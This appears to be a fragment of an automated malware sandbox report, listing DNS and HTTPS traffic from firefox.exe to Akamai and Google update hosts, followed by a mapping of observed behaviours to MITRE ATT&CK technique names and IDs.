88.221.134.155

DNS Request

a19.dscg10.akamai.net
8.8.8.8:53

a19.dscg10.akamai.net

dns

firefox.exe

134 B
246 B
2
2

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:869b

2a02:26f0:a1::58dd:86d1

DNS Request

a19.dscg10.akamai.net

DNS Response

2a02:26f0:a1::58dd:86d1

2a02:26f0:a1::58dd:869b
8.8.8.8:53

155.134.221.88.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

155.134.221.88.in-addr.arpa
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

142.250.187.206
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

130 B
81 B
2
1

DNS Request

redirector.gvt1.com

DNS Request

redirector.gvt1.com

DNS Response

142.250.187.206
8.8.8.8:53

redirector.gvt1.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

redirector.gvt1.com

DNS Response

2a00:1450:4009:81f::200e
142.250.187.206:443

redirector.gvt1.com

https

firefox.exe

7.6kB
12.2kB
14
13
8.8.8.8:53

r4---sn-aigzrnsz.gvt1.com

dns

firefox.exe

142 B
116 B
2
1

DNS Request

r4---sn-aigzrnsz.gvt1.com

DNS Request

r4---sn-aigzrnsz.gvt1.com

DNS Response

74.125.175.169
8.8.8.8:53

r4.sn-aigzrnsz.gvt1.com

dns

firefox.exe

69 B
85 B
1
1

DNS Request

r4.sn-aigzrnsz.gvt1.com

DNS Response

74.125.175.169
8.8.8.8:53

r4.sn-aigzrnsz.gvt1.com

dns

firefox.exe

69 B
97 B
1
1

DNS Request

r4.sn-aigzrnsz.gvt1.com

DNS Response

2a00:1450:4009:1b::9
8.8.8.8:53

206.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.187.250.142.in-addr.arpa
8.8.8.8:53

169.175.125.74.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

169.175.125.74.in-addr.arpa
74.125.175.169:443

r4.sn-aigzrnsz.gvt1.com

https

firefox.exe

2.0kB
6.1kB
7
9

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion